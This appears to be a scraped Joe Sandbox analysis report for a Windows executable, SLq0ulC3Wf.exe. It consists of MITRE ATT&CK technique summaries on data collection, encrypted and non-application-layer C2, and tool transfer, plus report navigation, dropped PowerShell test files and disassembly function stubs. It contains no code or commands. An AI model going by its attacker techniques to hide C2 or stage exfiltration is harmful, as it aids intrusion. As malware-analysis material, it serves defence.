Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SLq0ulC3Wf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SLq0ulC3Wf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\-631756

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4b1mi4g.cux.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3njuscn.ocr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vblqtist.oon.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zidf0pbr.cje.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
SLq0ulC3Wf.exe

Function 07969E03 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Function 07969E08 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 016BB1F0 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 0796C8BF Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 016B590C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Function 016B449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre